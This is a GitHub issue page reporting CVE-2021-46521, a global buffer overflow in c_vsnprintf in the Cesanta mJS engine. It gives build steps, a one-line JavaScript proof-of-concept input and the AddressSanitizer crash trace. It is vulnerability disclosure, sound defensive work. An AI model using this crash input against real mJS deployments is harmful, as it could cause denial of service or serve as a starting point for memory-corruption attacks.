Headline
CVE-2021-46521: Global-buffer-overflow mjs/src/common/str_util.c:180:14 in c_vsnprintf · Issue #190 · cesanta/mjs
Cesanta MJS v2.20.0 was discovered to contain a global buffer overflow via c_vsnprintf at mjs/src/common/str_util.c.
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Open
hope-fly opened this issue
Dec 31, 2021
· 0 comments
Comments
mJS revision
Commit: b1b6eac
Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
vim Makefile DOCKER_CLANG=clang $(DOCKER_CLANG) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)
save the makefile then make
make
Test casepoc.js
(JSON.stringify([1, 2, 3]))((JSON.parse - 6. + 4321e2)([([JSON.parse(JSON.stringify([(0)]))])]));
Execution steps & Output
$ ./mjs/build/mjs poc.js
==61818==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000064c54a at pc 0x0000005ea260 bp 0x7fff3bbcc940 sp 0x7fff3bbcc938 WRITE of size 4 at 0x00000064c54a thread T0 #0 0x5ea25f in c_vsnprintf /root/mjs/src/common/str_util.c:180:14 #1 0x55178f in mjs_exec_internal /root/mjs/src/mjs_exec.c:1073:5 #2 0x552d2d in mjs_exec_file /root/mjs/src/mjs_exec.c:1096:11 #3 0x5821d3 in main /root/mjs/src/mjs_main.c:47:11 #4 0x7f1016453b96 in __libc_start_main /build/glibc-2ORdQG/glibc-2.27/csu/…/csu/libc-start.c:310 #5 0x41a2c9 in _start (/usr/local/bin/mjs+0x41a2c9)
0x00000064c54a is located 54 bytes to the left of global variable ‘<string literal>’ defined in ‘src/mjs_util.c:125:7’ (0x64c580) of size 15 ‘<string literal>’ is ascii string ‘src/mjs_util.c’ 0x00000064c54b is located 0 bytes to the right of global variable ‘<string literal>’ defined in ‘src/mjs_util.c:120:30’ (0x64c540) of size 11 ‘<string literal>’ is ascii string ' %-3u %-8s’ SUMMARY: AddressSanitizer: global-buffer-overflow /root/mjs/src/common/str_util.c:180:14 in c_vsnprintf Shadow bytes around the buggy address: 0x0000800c1850: 00 02 f9 f9 f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9 0x0000800c1860: 07 f9 f9 f9 f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9 0x0000800c1870: 06 f9 f9 f9 f9 f9 f9 f9 00 01 f9 f9 f9 f9 f9 f9 0x0000800c1880: 00 02 f9 f9 f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9 0x0000800c1890: 00 02 f9 f9 f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9 =>0x0000800c18a0: 00 04 f9 f9 f9 f9 f9 f9 00[03]f9 f9 f9 f9 f9 f9 0x0000800c18b0: 00 07 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9 0x0000800c18c0: 07 f9 f9 f9 f9 f9 f9 f9 00 05 f9 f9 f9 f9 f9 f9 0x0000800c18d0: 00 02 f9 f9 f9 f9 f9 f9 06 f9 f9 f9 f9 f9 f9 f9 0x0000800c18e0: 00 00 04 f9 f9 f9 f9 f9 02 f9 f9 f9 f9 f9 f9 f9 0x0000800c18f0: 02 f9 f9 f9 f9 f9 f9 f9 02 f9 f9 f9 f9 f9 f9 f9 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==61818==ABORTING
Credits: Found by OWL337 team.
hope-fly changed the title Global-buffer-overflow mjs/src/mjs_string.c:58:15 in mjs_mk_string Global-buffer-overflow mjs/src/common/str_util.c:180:14 in c_vsnprintf
Dec 31, 2021
1 participant